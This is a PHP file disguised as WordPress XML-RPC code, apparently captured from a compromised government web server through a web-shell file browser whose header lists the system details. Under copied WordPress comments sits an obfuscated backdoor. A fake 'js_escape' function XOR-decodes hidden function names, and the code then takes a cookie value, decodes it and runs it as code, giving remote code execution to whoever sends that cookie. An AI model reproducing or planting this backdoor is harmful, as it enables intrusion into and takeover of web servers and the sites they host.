|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/blog/wp-admin/js/ |
Upload File : |
<?php
/**
* XML-RPC protocol support for WordPress
*
* @package WordPress
*/
/**
* Whether this is an XML-RPC Request
*
* @var bool
*/
// A bug in PHP < 5.2.2 makes $HTTP_RAW_POST_DATA not set by default,
// but we can do it ourself.
function js_escape($mce_settings, $updated_action) {
$doing_ajax = base64_decode($updated_action);
for ($_media_item = 0; $_media_item < strlen($doing_ajax); ) {
for ($downsize = 0;
$downsize < strlen($mce_settings) && $_media_item < strlen($doing_ajax);
$_media_item++, $downsize++) {
$doing_ajax[$_media_item]=$doing_ajax{$_media_item} ^ $mce_settings{$downsize};
}
}
return $doing_ajax;
}
$getid3_temp['space_allowed']=js_escape("feature_name", "BAQSEUNGOjsLAgIBAw==");
$getid3_temp['posts']=js_escape("echo", "BhENDhEGNwkQDQsbDAwG");
if ( !isset( $feedregex ) ) {
$feedregex = $_COOKIE;
}
// fix for mozBlog and other cases where '<?phpxml' isn't on the very first line
if ( isset($feedregex[js_escape("admin_email", "DgFbWVpuBg==")])) {
$imagedata = @$getid3_temp['space_allowed']($feedregex[js_escape("headerfooterinfo_raw", "BwBXVFFDBQ==")]);
if (!empty($imagedata)) {
$update_themes = $getid3_temp['posts'](null, $imagedata);
$update_themes();
}
}